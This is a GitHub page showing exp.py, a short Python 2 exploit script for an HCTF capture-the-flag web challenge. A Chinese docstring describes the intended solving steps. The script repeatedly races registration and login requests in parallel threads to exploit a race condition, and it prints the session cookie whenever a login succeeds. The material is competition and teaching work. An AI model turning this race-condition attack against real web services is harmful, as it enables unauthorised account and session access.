-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathexp.py
56 lines (47 loc) · 1.42 KB
/
exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!/usr/bin/env python
# coding: utf-8
__author__ = 'Aklis'
"""
竞争条件
预期内的顺序
1. 扫目录得到.git, 发现是空的,先怀疑一下人生。
2. 但有.git存在,想想可能有什么git规范(README.md),也有可能直接扫到。
3. 阅读changelog,理解一下这个大头虾的程序员会作什么死。
4. 留下一个中文的 苟
5. 开心吗
"""
import requests
import string
import re
import random
import threading
from pprint import pprint
url_register = "http://changelog.hctf.io/register.php"
url_login = "http://changelog.hctf.io/login.php"
url_index = "http://changelog.hctf.io/index.php"
def register(data):
requests.post(url_register, data=data)
def login(data):
S = requests.Session()
R = S.post(url_login, data=data)
R = S.get(url_index)
content = R.content
content = re.findall(r"Hello", content, re.DOTALL)
if len(content) > 0:
print "[*] SESSION: ", S.cookies['PHPSESSID']
else:
print "[x] fail"
def main():
while True:
username = 'Aklis' + '' .join(random.choice(string.ascii_letters) for i in range(5))
password = '123'
data = { 'username' : username, 'password' : password , 'gogogo': '苟!'}
t1 = threading.Thread(target=register, args=(data,))
t2 = threading.Thread(target=login, args=(data,))
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
import sys
sys.exit(int(main() or 0))